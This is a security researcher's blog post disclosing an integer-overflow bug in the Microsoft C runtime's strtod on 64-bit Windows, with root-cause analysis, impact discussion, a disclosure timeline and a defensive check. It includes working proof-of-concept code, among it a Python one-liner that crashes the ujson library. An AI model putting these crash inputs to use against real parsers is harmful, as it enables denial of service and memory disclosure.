Some time ago I was reading a random Python JSON parsing library that was partly implemented in C. At one point I thought I had spotted a bug in its custom float parsing, so I wrote a short PoC to trigger it. It worked (i.e. it crashed Python), but it behaved differently than I expected and seemed to work only on Windows. So I went back to the code and in the end decided it was only my imagination: there was no bug. So… why did that PoC actually work? It turned out that in some cases the library fell back to the good old strtod for float parsing, and yes, there was a bug: in the underlying msvcrt.dll strtod implementation.

TL;DR

  • strtod and friends (string-to-double) take a char **endptr output parameter, in which they store the address of the first character after the converted number in the input buffer. Parsers use this parameter to determine where to continue parsing after a number has been read.
  • Since internally strtod (or actually _fltin2 and _wfltin2, which are used deep inside) stores the number of parsed characters in a 32-bit int, the final calculation of endptr (startptr + number-of-parsed-characters) may, on 64-bit systems, produce an address that lies before the start of the input text buffer.
  • This can introduce DoS, information leak, or other classes of bugs in parsers that rely on strtod and the endptr parameter.

Note: Neither the glibc nor the MinGW (statically linked) strtod implementation has this bug; it is msvcr*.dll specific.
Note 2: PoCs are at the bottom.

Root cause

The direct problem is in the _flt structure used by the _fltin2 and _wfltin2 functions, which do the actual string-to-double conversion in strtod/etc (see Affected versions and functions below). This structure looks as follows (Visual C++ CRT source code, file \crt\src\fltintrn.h):

typedef struct _flt
{
       int flags;
       int nbytes;          /* number of characters read */
       long lval;
       double dval;         /* the returned floating point number */
}        *FLT;

This causes problems with overly long numbers on 64-bit platforms, since nbytes is a 32-bit int and can overflow: a number at least 2GB and less than 4GB long leaves it negative, a number exactly 4GB long leaves it at zero, and so on for longer inputs.

This is problematic for strtod/et al., since they calculate the *endptr value in the following way (\crt\src\strtod.c):

       struct _flt answerstruct;
       FLT      answer;
...
       answer = _fltin2( &answerstruct, ptr, _loc_update.GetLocaleT());

       if ( endptr != NULL )
               *endptr = (char *) ptr + answer->nbytes;
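
The arithmetic can be reproduced without allocating a multi-gigabyte buffer. The following is a minimal sketch, not CRT code: simulated_end_offset is a hypothetical helper that mimics squeezing the real number of consumed characters through a 32-bit signed field such as nbytes and then adding it to a 64-bit pointer. It assumes the usual two's-complement wraparound on the narrowing conversion, which is implementation-defined in C but is what mainstream compilers do.

```c
#include <stdint.h>

/* Hypothetical helper, not part of the CRT: returns the offset that would be
 * added to the start pointer if the real number of consumed characters were
 * stored in a 32-bit signed field such as _flt.nbytes. */
int64_t simulated_end_offset(uint64_t consumed)
{
    /* Keep only the low 32 bits, then reinterpret them as signed. The
     * unsigned-to-signed conversion is implementation-defined for values
     * above INT32_MAX; this sketch assumes it wraps (two's complement). */
    int32_t nbytes = (int32_t)(uint32_t)consumed;

    /* Adding an int to a 64-bit pointer sign-extends it to pointer width. */
    return (int64_t)nbytes;
}
```

For the 0x80000015 characters consumed in the PoC at the bottom, simulated_end_offset(0x80000015) gives -0x7FFFFFEB, i.e. an end pointer almost 2GB before the start of the buffer. For a count of exactly 0x100000000 it gives 0, i.e. an end pointer equal to the start pointer.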

A reasonably common way to use strtod in parsers (think: a JSON/XML/CSV/etc parser) is to do something like this:

...
if (looks_like_a_double(p)) {
 char *ep;
 val = strtod(p, &ep);
 // errno checking / usage of val here
 p = ep;  // continue parsing right after the number
 continue;
}
...

With the nbytes overflow described above, p ends up pointing outside of the buffer (up to 2GB before its start) and the parsing continues there.
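
A parser can defend itself against the two most visible symptoms by sanity-checking the returned end pointer before using it. The following is a minimal sketch under stated assumptions: strtod_checked is a hypothetical wrapper (not taken from any library), and buf_end is assumed to point at the terminating NUL of the buffer that contains start.

```c
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical wrapper: parses a double at `start` and accepts the result
 * only if the reported end pointer lies in (start, buf_end].
 * Returns 1 on success, 0 if strtod made no progress or reported an end
 * pointer outside that range. */
int strtod_checked(const char *start, const char *buf_end,
                   double *out, const char **next)
{
    char *ep = NULL;
    double val = strtod(start, &ep);

    /* No progress: either nothing was parsed or the count wrapped to 0. */
    if (ep == start)
        return 0;

    /* Compare as integers: relational comparison of pointers that may not
     * point into the same object is undefined behaviour in C. */
    uintptr_t s = (uintptr_t)start;
    uintptr_t e = (uintptr_t)ep;
    uintptr_t lim = (uintptr_t)buf_end;
    if (e < s || e > lim)
        return 0;

    *out = val;
    *next = ep;
    return 1;
}
```

This only catches a count that wrapped to zero or to a negative value. A count that wrapped to a small positive value (a number slightly longer than 4GB) would still yield an in-range pointer, so capping the length of a numeric token before calling strtod is the more robust option.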

Impact

Since this is a low-level library function, the impact depends on what it is used for. Here are a couple of examples (assuming that strtod is part of a parser that is passed untrusted input, e.g. a JSON or CSV file):
  • Infinite loop DoS - if the input number is 4 GB long, the resulting end pointer will be identical to the start pointer, so the parser will fall into an infinite loop (strtod doesn't report any error of course, since the number is correctly parsed)
  • Crash DoS - setting the end pointer so that it points to unallocated memory (e.g. for a number of length 2GB the end pointer will be the start pointer minus 2GB, which probably points to some unallocated memory or isn't even a canonical pointer)
  • Information disclosure - since you could redirect the "read pointer" of the parser to any buffer in memory that lies at a lower address than the start pointer (within 2GB of it), you could make it read other data from memory; if the data read is later reflected back to you, you could retrieve it.
  • Other - there might be other, less probable (but still possible) examples; one would be a more complicated scenario where the parsed text (code) is verified beforehand, and then parsed and executed. In such a case this bug could be used to redirect the parser to jump into e.g. the middle of a string/comment containing unsafe code (similar to jumping into the middle of an instruction in ROP, but on the scripting language level). This would make an awesome CTF challenge, but I don't expect it to be found in real products.

Affected versions and functions

64-bit Windows only.

This has been confirmed on:
  • default, fully patched Windows 7 msvcrt.dll
  • msvcr90.dll, msvcr110.dll
  • newest Visual Studio 2013 redistributables msvcr120.dll
  • Windows 8.1 (preview) default msvcrt.dll
I guess we can extrapolate this to "all 64-bit versions".

Affected functions (generally: everything that directly or indirectly uses _flt.nbytes for anything meaningful):
  • _fltin2/_wfltin2 - these incorrectly calculate the _flt.nbytes
  • _strtod_l/_wcstod_l - these directly use _flt.nbytes
  • strtod/wcstod - these are just wrappers for the above functions
  • _Stodx/_Stod/_Stofx/_Stof - these use strtod
Worth looking for variants (e.g. __strgtold12_l/__strgtold12?).

Proof of concept

This proof of concept prints both the correct end pointer and the one returned by strtod.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {

 // SZ == INT_MAX + some more bytes
#define SZ 0x80000016

 char *number = (char*)malloc(SZ);
 if (number == NULL) { // A >2GB allocation can easily fail.
   puts("malloc failed");
   return 1;
 }
 memset(number, '1', SZ);
 number[SZ-1] = 'm'; // Break syntax.
 number[1]    = '.'; // This is probably not needed.

 char *end_good   = number + SZ - 1;
 char *end_strtod;

 // strtod(number, &end_strtod); is OK too
 // ... unless you use MinGW, which uses its own strtod;
 // then it's better to just use _strtod_l for the PoC.
 _strtod_l(number, &end_strtod, NULL);

 printf("number     = %p\n", number);
 printf("end_good   = %p\n", end_good);
 printf("end_strtod = %p\n", end_strtod);      

 // Example (faulty) results.
 // number     = 000000007FFF0040
 // end_good   = 00000000FFFF0055
 // end_strtod = FFFFFFFFFFFF0055

 return 0;
}

Real world example

A random JSON parser for Python with native code - ujson 1.33:

FASTCALL_ATTR JSOBJ FASTCALL_MSVC decodePreciseFloat(struct DecoderState *ds)
{
 char *end;
 double value;
 errno = 0;

 value = strtod(ds->start, &end);

 if (errno == ERANGE)
 {
   return SetError(ds, -1, "Range error when decoding numeric as double");
 }

 ds->start = end;
 return ds->dec->newDouble(ds->prv, value);
}

And a crash DoS PoC in Python (2.7 AMD64):

import ujson

n = "4." + "3"*0x7fffffff
x = ujson.loads(n, precise_float=True)

WinDBG says:

(2088.1fa4): Access violation - code c0000005 (first chance)
ujson!JSON_DecodeObject+0x8c:
00000001`800050dc 8a0a            mov     cl,byte ptr [rdx] ds:00000001`00010061=??
(rdx==0x100010061)

Report

I've reported the bug to Microsoft and the decision was to fix it in future releases of Microsoft Visual C++ / Microsoft Windows. I think that's OK, especially since the chance of severe vulnerabilities appearing as a result of this Microsoft C runtime library bug is minimal (that said, if you find one, let me know ;>).

Timeline

Note: A lot of e-mails were flying back and forth, so I'm not going to list all dates.

2013-Aug-21: Sent the report to Microsoft.
2013-Sep-17: Confirmation that the bug works as described and is planned to be fixed.
2013-Oct-26: More information - the bug will be fixed in the next versions of msvcr*.dll.
2013-Nov-13: Microsoft receives the draft of this blog post from me for comments.
2013-Nov-23: Blogpost is public.

And that's it.

Comments:

2013-11-23 10:57:23 = Wlfrn
{
#include <stdio.h> missing?
}
2013-11-23 20:24:03 = Gynvael Coldwind
{
@Wlfrn
Thanks! Fixed :)
}
2013-11-25 20:04:13 = gim
{
if anyone is parsing >2G json file (or any other 'number', that is 2G long), he should be shoot down immediately ;)
}
2013-12-18 08:19:04 = Hey Dude
{
gim, it appears that Microsoft agree with you.
}
